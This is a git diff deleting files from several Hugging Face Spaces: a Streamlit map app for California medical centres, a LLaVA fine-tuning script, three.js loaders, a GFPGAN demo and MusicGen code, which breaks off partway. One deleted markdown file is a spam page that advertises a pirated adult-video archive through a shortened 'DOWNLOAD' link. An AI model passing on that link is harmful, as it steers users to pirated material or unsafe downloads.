render_folium_map(coords): - m = folium.Map(location=[coords[0][0], coords[0][1]], zoom_start=13) - folium.PolyLine(coords, color="blue", weight=2.5, opacity=1).add_to(m) - return m - -# Function to add medical center paths and annotate distance -def add_medical_center_paths(m, source, med_centers): - for name, lat, lon, specialty, city in med_centers: - _, coords = get_directions_and_coords(source, (lat, lon)) - if coords: - folium.PolyLine(coords, color="red", weight=2.5, opacity=1).add_to(m) - folium.Marker([lat, lon], popup=name).add_to(m) - distance_info = gmaps.distance_matrix(source, (lat, lon), mode='driving') - distance = distance_info['rows'][0]['elements'][0]['distance']['text'] - folium.map.Marker( - [coords[-1][0], coords[-1][1]], - icon=folium.DivIcon( - icon_size=(150, 36), - icon_anchor=(0, 0), - html=f'
{distance}
', - ) - ).add_to(m) - -# Streamlit UI -st.title('Google Maps and California Medical Centers 🌴') -st.sidebar.header('Directions') - -source_location = st.sidebar.text_input("Source Location", "Venice Beach, CA") -destination_location = st.sidebar.text_input("Destination Location", "Santa Monica, CA") - -if st.sidebar.button('Get Directions'): - steps, coords = get_directions_and_coords(source_location, destination_location) - if steps and coords: - st.subheader('Driving Directions:') - for i, step in enumerate(steps): - st.write(f"{i+1}. {step['html_instructions']}") - st.subheader('Route on Map:') - m1 = render_folium_map(coords) - folium_static(m1) - else: - st.write("No available routes.") - -# Top 10 medical centers in California -california_med_centers = [ - ('UCLA Medical Center', 34.0665, -118.4467, 'General medical and surgical', 'Los Angeles'), - ('Cedars-Sinai Medical Center', 34.0762, -118.3801, 'Heart specialty', 'Los Angeles'), - ('UCSF Medical Center', 37.7631, -122.4576, 'Teaching hospital', 'San Francisco'), - ('Stanford Health Care-Stanford Hospital', 37.4331, -122.1754, 'Teaching hospital', 'Stanford'), - ('Scripps La Jolla Hospitals', 32.8844, -117.2256, 'General medical and surgical', 'La Jolla'), - ('Sharp Memorial Hospital', 32.8002, -117.1542, 'Community hospital', 'San Diego'), - ('UCSD Medical Center-Hillcrest', 32.7550, -117.1711, 'Teaching hospital', 'San Diego'), - ('Hoag Memorial Hospital Presbyterian', 33.6117, -117.8771, 'Community hospital', 'Newport Beach'), - ('UCI Medical Center', 33.7886, -117.8934, 'Teaching hospital', 'Orange'), - ('Long Beach Memorial Medical Center', 33.8034, -118.1689, 'Community hospital', 'Long Beach') -] - -# Annotate distances and paths for each medical center -st.markdown("## 🏥 California Medical Centers 🌴") -m2 = folium.Map(location=[34.0522, -118.2437], zoom_start=6) -marker_cluster = MarkerCluster().add_to(m2) -add_medical_center_paths(m2, source_location, california_med_centers) -folium_static(m2) diff --git a/spaces/badayvedat/LLaVA/scripts/finetune_full_schedule.sh b/spaces/badayvedat/LLaVA/scripts/finetune_full_schedule.sh deleted file mode 100644 index 533f3f4097db3844846d4a843d765c6df1762ba0..0000000000000000000000000000000000000000 --- a/spaces/badayvedat/LLaVA/scripts/finetune_full_schedule.sh +++ /dev/null @@ -1,46 +0,0 @@ -#!/bin/bash - -# Uncomment and set the following variables correspondingly to run this script: - -################## VICUNA ################## -# PROMPT_VERSION=v1 -# MODEL_VERSION="vicuna-v1-3-7b" -################## VICUNA ################## - -################## LLaMA-2 ################## -# PROMPT_VERSION="llava_llama_2" -# MODEL_VERSION="llama-2-7b-chat" -################## LLaMA-2 ################## - -deepspeed llava/train/train_mem.py \ - --deepspeed ./scripts/zero2.json \ - --model_name_or_path ./checkpoints/$MODEL_VERSION \ - --version $PROMPT_VERSION \ - --data_path ./playground/data/llava_instruct_158k.json \ - --image_folder /path/to/coco/train2017 \ - --vision_tower openai/clip-vit-large-patch14 \ - --pretrain_mm_mlp_adapter ./checkpoints/llava-$MODEL_VERSION-pretrain/mm_projector.bin \ - --mm_vision_select_layer -2 \ - --mm_use_im_start_end False \ - --mm_use_im_patch_token False \ - --bf16 True \ - --output_dir ./checkpoints/llava-$MODEL_VERSION-finetune \ - --num_train_epochs 3 \ - --per_device_train_batch_size 16 \ - --per_device_eval_batch_size 4 \ - --gradient_accumulation_steps 1 \ - --evaluation_strategy "no" \ - --save_strategy "steps" \ - --save_steps 50000 \ - --save_total_limit 1 \ - --learning_rate 2e-5 \ - --weight_decay 0. \ - --warmup_ratio 0.03 \ - --lr_scheduler_type "cosine" \ - --logging_steps 1 \ - --tf32 True \ - --model_max_length 2048 \ - --gradient_checkpointing True \ - --dataloader_num_workers 4 \ - --lazy_preprocess True \ - --report_to wandb diff --git a/spaces/banana-projects/web3d/node_modules/three/examples/js/loaders/deprecated/LegacyJSONLoader.js b/spaces/banana-projects/web3d/node_modules/three/examples/js/loaders/deprecated/LegacyJSONLoader.js deleted file mode 100644 index 0746af1109c6436282eb21e5b3a148fccff1e29f..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/examples/js/loaders/deprecated/LegacyJSONLoader.js +++ /dev/null @@ -1,578 +0,0 @@ -/** - * @author mrdoob / http://mrdoob.com/ - * @author alteredq / http://alteredqualia.com/ - */ - -THREE.LegacyJSONLoader = ( function () { - - function LegacyJSONLoader( manager ) { - - if ( typeof manager === 'boolean' ) { - - console.warn( 'THREE.JSONLoader: showStatus parameter has been removed from constructor.' ); - manager = undefined; - - } - - this.manager = ( manager !== undefined ) ? manager : THREE.DefaultLoadingManager; - - this.withCredentials = false; - - } - - Object.assign( LegacyJSONLoader.prototype, { - - crossOrigin: 'anonymous', - - load: function ( url, onLoad, onProgress, onError ) { - - var scope = this; - - var path = ( this.path === undefined ) ? THREE.LoaderUtils.extractUrlBase( url ) : this.path; - - var loader = new THREE.FileLoader( this.manager ); - loader.setPath( this.path ); - loader.setWithCredentials( this.withCredentials ); - loader.load( url, function ( text ) { - - var json = JSON.parse( text ); - var metadata = json.metadata; - - if ( metadata !== undefined ) { - - var type = metadata.type; - - if ( type !== undefined ) { - - if ( type.toLowerCase() === 'object' ) { - - console.error( 'THREE.JSONLoader: ' + url + ' should be loaded with THREE.ObjectLoader instead.' ); - return; - - } - - } - - } - - var object = scope.parse( json, path ); - onLoad( object.geometry, object.materials ); - - }, onProgress, onError ); - - }, - - setPath: function ( value ) { - - this.path = value; - return this; - - }, - - setResourcePath: function ( value ) { - - this.resourcePath = value; - return this; - - }, - - setCrossOrigin: function ( value ) { - - this.crossOrigin = value; - return this; - - }, - - parse: ( function () { - - function parseModel( json, geometry ) { - - function isBitSet( value, position ) { - - return value & ( 1 << position ); - - } - - var i, j, fi, - - offset, zLength, - - colorIndex, normalIndex, uvIndex, materialIndex, - - type, - isQuad, - hasMaterial, - hasFaceVertexUv, - hasFaceNormal, hasFaceVertexNormal, - hasFaceColor, hasFaceVertexColor, - - vertex, face, faceA, faceB, hex, normal, - - uvLayer, uv, u, v, - - faces = json.faces, - vertices = json.vertices, - normals = json.normals, - colors = json.colors, - - scale = json.scale, - - nUvLayers = 0; - - - if ( json.uvs !== undefined ) { - - // disregard empty arrays - - for ( i = 0; i < json.uvs.length; i ++ ) { - - if ( json.uvs[ i ].length ) nUvLayers ++; - - } - - for ( i = 0; i < nUvLayers; i ++ ) { - - geometry.faceVertexUvs[ i ] = []; - - } - - } - - offset = 0; - zLength = vertices.length; - - while ( offset < zLength ) { - - vertex = new THREE.Vector3(); - - vertex.x = vertices[ offset ++ ] * scale; - vertex.y = vertices[ offset ++ ] * scale; - vertex.z = vertices[ offset ++ ] * scale; - - geometry.vertices.push( vertex ); - - } - - offset = 0; - zLength = faces.length; - - while ( offset < zLength ) { - - type = faces[ offset ++ ]; - - isQuad = isBitSet( type, 0 ); - hasMaterial = isBitSet( type, 1 ); - hasFaceVertexUv = isBitSet( type, 3 ); - hasFaceNormal = isBitSet( type, 4 ); - hasFaceVertexNormal = isBitSet( type, 5 ); - hasFaceColor = isBitSet( type, 6 ); - hasFaceVertexColor = isBitSet( type, 7 ); - - // console.log("type", type, "bits", isQuad, hasMaterial, hasFaceVertexUv, hasFaceNormal, hasFaceVertexNormal, hasFaceColor, hasFaceVertexColor); - - if ( isQuad ) { - - faceA = new THREE.Face3(); - faceA.a = faces[ offset ]; - faceA.b = faces[ offset + 1 ]; - faceA.c = faces[ offset + 3 ]; - - faceB = new THREE.Face3(); - faceB.a = faces[ offset + 1 ]; - faceB.b = faces[ offset + 2 ]; - faceB.c = faces[ offset + 3 ]; - - offset += 4; - - if ( hasMaterial ) { - - materialIndex = faces[ offset ++ ]; - faceA.materialIndex = materialIndex; - faceB.materialIndex = materialIndex; - - } - - // to get face <=> uv index correspondence - - fi = geometry.faces.length; - - if ( hasFaceVertexUv ) { - - for ( i = 0; i < nUvLayers; i ++ ) { - - uvLayer = json.uvs[ i ]; - - geometry.faceVertexUvs[ i ][ fi ] = []; - geometry.faceVertexUvs[ i ][ fi + 1 ] = []; - - for ( j = 0; j < 4; j ++ ) { - - uvIndex = faces[ offset ++ ]; - - u = uvLayer[ uvIndex * 2 ]; - v = uvLayer[ uvIndex * 2 + 1 ]; - - uv = new THREE.Vector2( u, v ); - - if ( j !== 2 ) geometry.faceVertexUvs[ i ][ fi ].push( uv ); - if ( j !== 0 ) geometry.faceVertexUvs[ i ][ fi + 1 ].push( uv ); - - } - - } - - } - - if ( hasFaceNormal ) { - - normalIndex = faces[ offset ++ ] * 3; - - faceA.normal.set( - normals[ normalIndex ++ ], - normals[ normalIndex ++ ], - normals[ normalIndex ] - ); - - faceB.normal.copy( faceA.normal ); - - } - - if ( hasFaceVertexNormal ) { - - for ( i = 0; i < 4; i ++ ) { - - normalIndex = faces[ offset ++ ] * 3; - - normal = new THREE.Vector3( - normals[ normalIndex ++ ], - normals[ normalIndex ++ ], - normals[ normalIndex ] - ); - - - if ( i !== 2 ) faceA.vertexNormals.push( normal ); - if ( i !== 0 ) faceB.vertexNormals.push( normal ); - - } - - } - - - if ( hasFaceColor ) { - - colorIndex = faces[ offset ++ ]; - hex = colors[ colorIndex ]; - - faceA.color.setHex( hex ); - faceB.color.setHex( hex ); - - } - - - if ( hasFaceVertexColor ) { - - for ( i = 0; i < 4; i ++ ) { - - colorIndex = faces[ offset ++ ]; - hex = colors[ colorIndex ]; - - if ( i !== 2 ) faceA.vertexColors.push( new THREE.Color( hex ) ); - if ( i !== 0 ) faceB.vertexColors.push( new THREE.Color( hex ) ); - - } - - } - - geometry.faces.push( faceA ); - geometry.faces.push( faceB ); - - } else { - - face = new THREE.Face3(); - face.a = faces[ offset ++ ]; - face.b = faces[ offset ++ ]; - face.c = faces[ offset ++ ]; - - if ( hasMaterial ) { - - materialIndex = faces[ offset ++ ]; - face.materialIndex = materialIndex; - - } - - // to get face <=> uv index correspondence - - fi = geometry.faces.length; - - if ( hasFaceVertexUv ) { - - for ( i = 0; i < nUvLayers; i ++ ) { - - uvLayer = json.uvs[ i ]; - - geometry.faceVertexUvs[ i ][ fi ] = []; - - for ( j = 0; j < 3; j ++ ) { - - uvIndex = faces[ offset ++ ]; - - u = uvLayer[ uvIndex * 2 ]; - v = uvLayer[ uvIndex * 2 + 1 ]; - - uv = new THREE.Vector2( u, v ); - - geometry.faceVertexUvs[ i ][ fi ].push( uv ); - - } - - } - - } - - if ( hasFaceNormal ) { - - normalIndex = faces[ offset ++ ] * 3; - - face.normal.set( - normals[ normalIndex ++ ], - normals[ normalIndex ++ ], - normals[ normalIndex ] - ); - - } - - if ( hasFaceVertexNormal ) { - - for ( i = 0; i < 3; i ++ ) { - - normalIndex = faces[ offset ++ ] * 3; - - normal = new THREE.Vector3( - normals[ normalIndex ++ ], - normals[ normalIndex ++ ], - normals[ normalIndex ] - ); - - face.vertexNormals.push( normal ); - - } - - } - - - if ( hasFaceColor ) { - - colorIndex = faces[ offset ++ ]; - face.color.setHex( colors[ colorIndex ] ); - - } - - - if ( hasFaceVertexColor ) { - - for ( i = 0; i < 3; i ++ ) { - - colorIndex = faces[ offset ++ ]; - face.vertexColors.push( new THREE.Color( colors[ colorIndex ] ) ); - - } - - } - - geometry.faces.push( face ); - - } - - } - - } - - function parseSkin( json, geometry ) { - - var influencesPerVertex = ( json.influencesPerVertex !== undefined ) ? json.influencesPerVertex : 2; - - if ( json.skinWeights ) { - - for ( var i = 0, l = json.skinWeights.length; i < l; i += influencesPerVertex ) { - - var x = json.skinWeights[ i ]; - var y = ( influencesPerVertex > 1 ) ? json.skinWeights[ i + 1 ] : 0; - var z = ( influencesPerVertex > 2 ) ? json.skinWeights[ i + 2 ] : 0; - var w = ( influencesPerVertex > 3 ) ? json.skinWeights[ i + 3 ] : 0; - - geometry.skinWeights.push( new THREE.Vector4( x, y, z, w ) ); - - } - - } - - if ( json.skinIndices ) { - - for ( var i = 0, l = json.skinIndices.length; i < l; i += influencesPerVertex ) { - - var a = json.skinIndices[ i ]; - var b = ( influencesPerVertex > 1 ) ? json.skinIndices[ i + 1 ] : 0; - var c = ( influencesPerVertex > 2 ) ? json.skinIndices[ i + 2 ] : 0; - var d = ( influencesPerVertex > 3 ) ? json.skinIndices[ i + 3 ] : 0; - - geometry.skinIndices.push( new THREE.Vector4( a, b, c, d ) ); - - } - - } - - geometry.bones = json.bones; - - if ( geometry.bones && geometry.bones.length > 0 && ( geometry.skinWeights.length !== geometry.skinIndices.length || geometry.skinIndices.length !== geometry.vertices.length ) ) { - - console.warn( 'When skinning, number of vertices (' + geometry.vertices.length + '), skinIndices (' + - geometry.skinIndices.length + '), and skinWeights (' + geometry.skinWeights.length + ') should match.' ); - - } - - } - - function parseMorphing( json, geometry ) { - - var scale = json.scale; - - if ( json.morphTargets !== undefined ) { - - for ( var i = 0, l = json.morphTargets.length; i < l; i ++ ) { - - geometry.morphTargets[ i ] = {}; - geometry.morphTargets[ i ].name = json.morphTargets[ i ].name; - geometry.morphTargets[ i ].vertices = []; - - var dstVertices = geometry.morphTargets[ i ].vertices; - var srcVertices = json.morphTargets[ i ].vertices; - - for ( var v = 0, vl = srcVertices.length; v < vl; v += 3 ) { - - var vertex = new THREE.Vector3(); - vertex.x = srcVertices[ v ] * scale; - vertex.y = srcVertices[ v + 1 ] * scale; - vertex.z = srcVertices[ v + 2 ] * scale; - - dstVertices.push( vertex ); - - } - - } - - } - - if ( json.morphColors !== undefined && json.morphColors.length > 0 ) { - - console.warn( 'THREE.JSONLoader: "morphColors" no longer supported. Using them as face colors.' ); - - var faces = geometry.faces; - var morphColors = json.morphColors[ 0 ].colors; - - for ( var i = 0, l = faces.length; i < l; i ++ ) { - - faces[ i ].color.fromArray( morphColors, i * 3 ); - - } - - } - - } - - function parseAnimations( json, geometry ) { - - var outputAnimations = []; - - // parse old style Bone/Hierarchy animations - var animations = []; - - if ( json.animation !== undefined ) { - - animations.push( json.animation ); - - } - - if ( json.animations !== undefined ) { - - if ( json.animations.length ) { - - animations = animations.concat( json.animations ); - - } else { - - animations.push( json.animations ); - - } - - } - - for ( var i = 0; i < animations.length; i ++ ) { - - var clip = THREE.AnimationClip.parseAnimation( animations[ i ], geometry.bones ); - if ( clip ) outputAnimations.push( clip ); - - } - - // parse implicit morph animations - if ( geometry.morphTargets ) { - - // TODO: Figure out what an appropraite FPS is for morph target animations -- defaulting to 10, but really it is completely arbitrary. - var morphAnimationClips = THREE.AnimationClip.CreateClipsFromMorphTargetSequences( geometry.morphTargets, 10 ); - outputAnimations = outputAnimations.concat( morphAnimationClips ); - - } - - if ( outputAnimations.length > 0 ) geometry.animations = outputAnimations; - - } - - return function parse( json, path ) { - - if ( json.data !== undefined ) { - - // Geometry 4.0 spec - json = json.data; - - } - - if ( json.scale !== undefined ) { - - json.scale = 1.0 / json.scale; - - } else { - - json.scale = 1.0; - - } - - var geometry = new THREE.Geometry(); - - parseModel( json, geometry ); - parseSkin( json, geometry ); - parseMorphing( json, geometry ); - parseAnimations( json, geometry ); - - geometry.computeFaceNormals(); - geometry.computeBoundingSphere(); - - if ( json.materials === undefined || json.materials.length === 0 ) { - - return { geometry: geometry }; - - } else { - - var materials = THREE.Loader.prototype.initMaterials( json.materials, this.resourcePath || path, this.crossOrigin ); - - return { geometry: geometry, materials: materials }; - - } - - }; - - } )() - - } ); - - return LegacyJSONLoader; - -} )(); diff --git a/spaces/banana-projects/web3d/node_modules/three/src/core/EventDispatcher.js b/spaces/banana-projects/web3d/node_modules/three/src/core/EventDispatcher.js deleted file mode 100644 index de5ca8ecf376970256074a1d9e16545cf03e29a8..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/src/core/EventDispatcher.js +++ /dev/null @@ -1,86 +0,0 @@ -/** - * https://github.com/mrdoob/eventdispatcher.js/ - */ - -function EventDispatcher() {} - -Object.assign( EventDispatcher.prototype, { - - addEventListener: function ( type, listener ) { - - if ( this._listeners === undefined ) this._listeners = {}; - - var listeners = this._listeners; - - if ( listeners[ type ] === undefined ) { - - listeners[ type ] = []; - - } - - if ( listeners[ type ].indexOf( listener ) === - 1 ) { - - listeners[ type ].push( listener ); - - } - - }, - - hasEventListener: function ( type, listener ) { - - if ( this._listeners === undefined ) return false; - - var listeners = this._listeners; - - return listeners[ type ] !== undefined && listeners[ type ].indexOf( listener ) !== - 1; - - }, - - removeEventListener: function ( type, listener ) { - - if ( this._listeners === undefined ) return; - - var listeners = this._listeners; - var listenerArray = listeners[ type ]; - - if ( listenerArray !== undefined ) { - - var index = listenerArray.indexOf( listener ); - - if ( index !== - 1 ) { - - listenerArray.splice( index, 1 ); - - } - - } - - }, - - dispatchEvent: function ( event ) { - - if ( this._listeners === undefined ) return; - - var listeners = this._listeners; - var listenerArray = listeners[ event.type ]; - - if ( listenerArray !== undefined ) { - - event.target = this; - - var array = listenerArray.slice( 0 ); - - for ( var i = 0, l = array.length; i < l; i ++ ) { - - array[ i ].call( this, event ); - - } - - } - - } - -} ); - - -export { EventDispatcher }; diff --git a/spaces/banana-projects/web3d/node_modules/three/src/extras/curves/ArcCurve.d.ts b/spaces/banana-projects/web3d/node_modules/three/src/extras/curves/ArcCurve.d.ts deleted file mode 100644 index 985917215ff44c33488f4ff33d28db2534eda1ca..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/src/extras/curves/ArcCurve.d.ts +++ /dev/null @@ -1,11 +0,0 @@ -import { EllipseCurve } from './EllipseCurve'; -export class ArcCurve extends EllipseCurve { - constructor( - aX: number, - aY: number, - aRadius: number, - aStartAngle: number, - aEndAngle: number, - aClockwise: boolean - ); -} diff --git a/spaces/banana-projects/web3d/node_modules/three/src/textures/DataTexture3D.js b/spaces/banana-projects/web3d/node_modules/three/src/textures/DataTexture3D.js deleted file mode 100644 index d34a3ab4e0094482ebc25077abdcad31b19ce58e..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/src/textures/DataTexture3D.js +++ /dev/null @@ -1,36 +0,0 @@ -/** - * @author Artur Trzesiok - */ - -import { Texture } from './Texture.js'; -import { ClampToEdgeWrapping, NearestFilter } from '../constants.js'; - -function DataTexture3D( data, width, height, depth ) { - - // We're going to add .setXXX() methods for setting properties later. - // Users can still set in DataTexture3D directly. - // - // var texture = new THREE.DataTexture3D( data, width, height, depth ); - // texture.anisotropy = 16; - // - // See #14839 - - Texture.call( this, null ); - - this.image = { data: data, width: width, height: height, depth: depth }; - - this.magFilter = NearestFilter; - this.minFilter = NearestFilter; - - this.wrapR = ClampToEdgeWrapping; - - this.generateMipmaps = false; - this.flipY = false; - -} - -DataTexture3D.prototype = Object.create( Texture.prototype ); -DataTexture3D.prototype.constructor = DataTexture3D; -DataTexture3D.prototype.isDataTexture3D = true; - -export { DataTexture3D }; diff --git a/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327004219.py b/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327004219.py deleted file mode 100644 index ed58c5e4509e8d73173deacd2716986623b3f65e..0000000000000000000000000000000000000000 --- a/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327004219.py +++ /dev/null @@ -1,65 +0,0 @@ -import os -#os.system("pip install gfpgan") - -#os.system("pip freeze") -#os.system("wget https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth -P .") -import random -import gradio as gr -from PIL import Image -import torch -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/a/ab/Abraham_Lincoln_O-77_matte_collodion_print.jpg/1024px-Abraham_Lincoln_O-77_matte_collodion_print.jpg', 'lincoln.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/5/50/Albert_Einstein_%28Nobel%29.png', 'einstein.png') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/9/9d/Thomas_Edison2.jpg/1024px-Thomas_Edison2.jpg', 'edison.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/a/a9/Henry_Ford_1888.jpg/1024px-Henry_Ford_1888.jpg', 'Henry.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/0/06/Frida_Kahlo%2C_by_Guillermo_Kahlo.jpg/800px-Frida_Kahlo%2C_by_Guillermo_Kahlo.jpg', 'Frida.jpg') - - - - -import cv2 -import glob -import numpy as np -from basicsr.utils import imwrite -from gfpgan import GFPGANer - -import warnings -warnings.warn('The unoptimized RealESRGAN is very slow on CPU. We do not use it. ' - 'If you really want to use it, please modify the corresponding codes.') -bg_upsampler = None - - - -# set up GFPGAN restorer -restorer = GFPGANer( - model_path='experiments/pretrained_models/GFPGANv1.3.pth', - upscale=2, - arch='clean', - channel_multiplier=2, - bg_upsampler=bg_upsampler) - - -def inference(img): - input_img = cv2.imread(img, cv2.IMREAD_COLOR) - restored_img = restorer.enhance( - input_img, has_aligned=False, only_center_face=False, paste_back=True) - - return Image.fromarray(restored_img[0][:,:,::-1]) - -title = "GFP-GAN" -description = "Gradio demo for GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior. To use it, simply upload your image, or click one of the examples to load them. Read more at the links below. Please click submit only once" -article = "

Towards Real-World Blind Face Restoration with Generative Facial Prior | Github Repo

visitor badge
" -gr.Interface( - inference, - [gr.inputs.Image(type="filepath", label="Input")], - gr.outputs.Image(type="pil", label="Output"), - title=title, - description=description, - article=article, - examples=[ - ['lincoln.jpg'], - ['einstein.png'], - ['edison.jpg'], - ['Henry.jpg'], - ['Frida.jpg'] - ] - ).launch(enable_queue=True,cache_examples=True) \ No newline at end of file diff --git a/spaces/bioriAsaeru/text-to-voice/CreampieThais.com - Minno (HD).rar [HOT].md b/spaces/bioriAsaeru/text-to-voice/CreampieThais.com - Minno (HD).rar [HOT].md deleted file mode 100644 index d375e39819fe3ad9ac5e7f89cfa070ce4eff8f71..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/CreampieThais.com - Minno (HD).rar [HOT].md +++ /dev/null @@ -1,6 +0,0 @@ -

CreampieThais.com - Minno (HD).rar


DOWNLOAD ::: https://urloso.com/2uyQk7



-
- aaccfb2cb3
-
-
-

diff --git a/spaces/brainblow/MusiCreator/audiocraft/models/musicgen.py b/spaces/brainblow/MusiCreator/audiocraft/models/musicgen.py deleted file mode 100644 index 007dd9e0ed1cfd359fb4889e7f4108248e189941..0000000000000000000000000000000000000000 --- a/spaces/brainblow/MusiCreator/audiocraft/models/musicgen.py +++ /dev/null @@ -1,362 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Main model for using MusicGen. This will combine all the required components -and provide easy access to the generation API. -""" - -import os -import typing as tp - -import torch - -from .encodec import CompressionModel -from .lm import LMModel -from .builders import get_debug_compression_model, get_debug_lm_model -from .loaders import load_compression_model, load_lm_model, HF_MODEL_CHECKPOINTS_MAP -from ..data.audio_utils import convert_audio -from ..modules.conditioners import ConditioningAttributes, WavCondition -from ..utils.autocast import TorchAutocast - - -MelodyList = tp.List[tp.Optional[torch.Tensor]] -MelodyType = tp.Union[torch.Tensor, MelodyList] - - -class MusicGen: - """MusicGen main model with convenient generation API. - - Args: - name (str): name of the model. - compression_model (CompressionModel): Compression model - used to map audio to invertible discrete representations. - lm (LMModel): Language model over discrete representations. - """ - def __init__(self, name: str, compression_model: CompressionModel, lm: LMModel, - max_duration: float = 30): - self.name = name - self.compression_model = compression_model - self.lm = lm - self.max_duration = max_duration - self.device = next(iter(lm.parameters())).device - self.generation_params: dict = {} - self.set_generation_params(duration=15) # 15 seconds by default - self._progress_callback: tp.Optional[tp.Callable[[int, int], None]] = None - if self.device.type == 'cpu': - self.autocast = TorchAutocast(enabled=False) - else: - self.autocast = TorchAutocast( - enabled=True, device_type=self.device.type, dtype=torch.float16) - - @property - def frame_rate(self) -> int: - """Roughly the number of AR steps per seconds.""" - return self.compression_model.frame_rate - - @property - def sample_rate(self) -> int: - """Sample rate of the generated audio.""" - return self.compression_model.sample_rate - - @property - def audio_channels(self) -> int: - """Audio channels of the generated audio.""" - return self.compression_model.channels - - @staticmethod - def get_pretrained(name: str = 'melody', device=None): - """Return pretrained model, we provide four models: - - small (300M), text to music, # see: https://huggingface.co/facebook/musicgen-small - - medium (1.5B), text to music, # see: https://huggingface.co/facebook/musicgen-medium - - melody (1.5B) text to music and text+melody to music, # see: https://huggingface.co/facebook/musicgen-melody - - large (3.3B), text to music, # see: https://huggingface.co/facebook/musicgen-large - """ - - if device is None: - if torch.cuda.device_count(): - device = 'cuda' - else: - device = 'cpu' - - if name == 'debug': - # used only for unit tests - compression_model = get_debug_compression_model(device) - lm = get_debug_lm_model(device) - return MusicGen(name, compression_model, lm) - - if name not in HF_MODEL_CHECKPOINTS_MAP: - if not os.path.isfile(name) and not os.path.isdir(name): - raise ValueError( - f"{name} is not a valid checkpoint name. " - f"Choose one of {', '.join(HF_MODEL_CHECKPOINTS_MAP.keys())}" - ) - - cache_dir = os.environ.get('MUSICGEN_ROOT', None) - compression_model = load_compression_model(name, device=device, cache_dir=cache_dir) - lm = load_lm_model(name, device=device, cache_dir=cache_dir) - if name == 'melody': - lm.condition_provider.conditioners['self_wav'].match_len_on_eval = True - - return MusicGen(name, compression_model, lm) - - def set_generation_params(self, use_sampling: bool = True, top_k: int = 250, - top_p: float = 0.0, temperature: float = 1.0, - duration: float = 30.0, cfg_coef: float = 3.0, - two_step_cfg: bool = False, extend_stride: float = 18): - """Set the generation parameters for MusicGen. - - Args: - use_sampling (bool, optional): Use sampling if True, else do argmax decoding. Defaults to True. - top_k (int, optional): top_k used for sampling. Defaults to 250. - top_p (float, optional): top_p used for sampling, when set to 0 top_k is used. Defaults to 0.0. - temperature (float, optional): Softmax temperature parameter. Defaults to 1.0. - duration (float, optional): Duration of the generated waveform. Defaults to 30.0. - cfg_coef (float, optional): Coefficient used for classifier free guidance. Defaults to 3.0. - two_step_cfg (bool, optional): If True, performs 2 forward for Classifier Free Guidance, - instead of batching together the two. This has some impact on how things - are padded but seems to have little impact in practice. - extend_stride: when doing extended generation (i.e. more than 30 seconds), by how much - should we extend the audio each time. Larger values will mean less context is - preserved, and shorter value will require extra computations. - """ - assert extend_stride < self.max_duration, "Cannot stride by more than max generation duration." - self.extend_stride = extend_stride - self.duration = duration - self.generation_params = { - 'use_sampling': use_sampling, - 'temp': temperature, - 'top_k': top_k, - 'top_p': top_p, - 'cfg_coef': cfg_coef, - 'two_step_cfg': two_step_cfg, - } - - def set_custom_progress_callback(self, progress_callback: tp.Optional[tp.Callable[[int, int], None]] = None): - """Override the default progress callback.""" - self._progress_callback = progress_callback - - def generate_unconditional(self, num_samples: int, progress: bool = False) -> torch.Tensor: - """Generate samples in an unconditional manner. - - Args: - num_samples (int): Number of samples to be generated. - progress (bool, optional): Flag to display progress of the generation process. Defaults to False. - """ - descriptions: tp.List[tp.Optional[str]] = [None] * num_samples - attributes, prompt_tokens = self._prepare_tokens_and_attributes(descriptions, None) - return self._generate_tokens(attributes, prompt_tokens, progress) - - def generate(self, descriptions: tp.List[str], progress: bool = False) -> torch.Tensor: - """Generate samples conditioned on text. - - Args: - descriptions (tp.List[str]): A list of strings used as text conditioning. - progress (bool, optional): Flag to display progress of the generation process. Defaults to False. - """ - attributes, prompt_tokens = self._prepare_tokens_and_attributes(descriptions, None) - assert prompt_tokens is None - return self._generate_tokens(attributes, prompt_tokens, progress) - - def generate_with_chroma(self, descriptions: tp.List[str], melody_wavs: MelodyType, - melody_sample_rate: int, progress: bool = False) -> torch.Tensor: - """Generate samples conditioned on text and melody. - - Args: - descriptions (tp.List[str]): A list of strings used as text conditioning. - melody_wavs: (torch.Tensor or list of Tensor): A batch of waveforms used as - melody conditioning. Should have shape [B, C, T] with B matching the description length, - C=1 or 2. It can be [C, T] if there is a single description. It can also be - a list of [C, T] tensors. - melody_sample_rate: (int): Sample rate of the melody waveforms. - progress (bool, optional): Flag to display progress of the generation process. Defaults to False. - """ - if isinstance(melody_wavs, torch.Tensor): - if melody_wavs.dim() == 2: - melody_wavs = melody_wavs[None] - if melody_wavs.dim() != 3: - raise ValueError("Melody wavs should have a shape [B, C, T].") - melody_wavs = list(melody_wavs) - else: - for melody in melody_wavs: - if melody is not None: - assert melody.dim() == 2, "One melody in the list has the wrong number of dims." - - melody_wavs = [ - convert_audio(wav, melody_sample_rate, self.sample_rate, self.audio_channels) - if wav is not None else None - for wav in melody_wavs] - attributes, prompt_tokens = self._prepare_tokens_and_attributes(descriptions=descriptions, prompt=None, - melody_wavs=melody_wavs) - assert prompt_tokens is None - return self._generate_tokens(attributes, prompt_tokens, progress) - - def generate_continuation(self, prompt: torch.Tensor, prompt_sample_rate: int, - descriptions: tp.Optional[tp.List[tp.Optional[str]]] = None, - progress: bool = False) -> torch.Tensor: - """Generate samples conditioned on audio prompts. - - Args: - prompt (torch.Tensor): A batch of waveforms used for continuation. - Prompt should be [B, C, T], or [C, T] if only one sample is generated. - 